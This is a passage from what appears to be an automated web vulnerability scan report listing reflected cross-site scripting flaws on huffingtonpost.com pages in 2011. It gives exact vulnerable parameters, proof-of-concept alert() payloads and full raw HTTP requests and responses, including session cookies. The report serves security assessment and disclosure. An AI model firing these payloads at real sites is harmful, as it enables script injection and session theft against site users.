   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0d5c"-alert(1)-"6cd81aa9f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e44cb<img src=a onerror=alert(1)>247063d742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_/e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742flex HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:42 GMT
Connection: close
Content-Length: 86

{"result":false,"spot":"right_rail_\/e44cb<img src=a onerror=alert(1)>247063d742flex"}

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The value of the spot request parameter is copied into the HTML document as plain text between tags. The payload 4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 was submitted in the spot parameter. This input was echoed as 4f9ed<img src=a onerror=alert(1)>7efda56f1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_flex4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:40 GMT
Connection: close
Content-Length: 85

{"result":false,"spot":"right_rail_flex4f9ed<img src=a onerror=alert(1)>7efda56f1f4"}

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /advertise/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3503"-alert(1)-"679e429de31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/?c3503"-alert(1)-"679e429de31=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96474
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/19
...[SNIP]...
ble_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/advertise/?c3503"-alert(1)-"679e429de31=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 27f4c<script>alert(1)</script>ea4f1e5950b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:43 GMT
Connection: close
Content-Length: 5901

window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"
...[SNIP]...

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 7d045<img%20src%3da%20onerror%3dalert(1)>df834abc014 was submitted in the gn parameter. This input was echoed as 7d045<img src=a onerror=alert(1)>df834abc014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_17d045<img%20src%3da%20onerror%3dalert(1)>df834abc014&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:42 GMT
Connection: close
Content-Length: 5904

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_17d045<img src=a onerror=alert(1)>df834abc014","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against Releasing Bin Laden Photos","views_amount"
...[SNIP]...

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload 963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3 was submitted in the sn parameter. This input was echoed as 963b6<img src=a onerror=alert(1)>f99a809b4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:41 GMT
Connection: close
Content-Length: 5924

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous963b6<img src=a onerror=alert(1)>f99a809b4c3"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against
...[SNIP]...

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edefa"%3balert(1)//4a8362f1dd2 was submitted in the vertical parameter. This input was echoed as edefa";alert(1)//4a8362f1dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=worldedefa"%3balert(1)//4a8362f1dd2 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Content-Length: 1352

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   <!-- Config -->    
   <script type="text/javascript">
       HPConfig.current_vertical_name = "worldedefa";alert(1)//4a8362f1dd2";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1304533217";
   </script>
...[SNIP]...

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40592"-alert(1)-"6794a9a72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/logout/?40592"-alert(1)-"6794a9a72f1=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82841
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/users/logout/?40592"-alert(1)-"6794a9a72f1=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
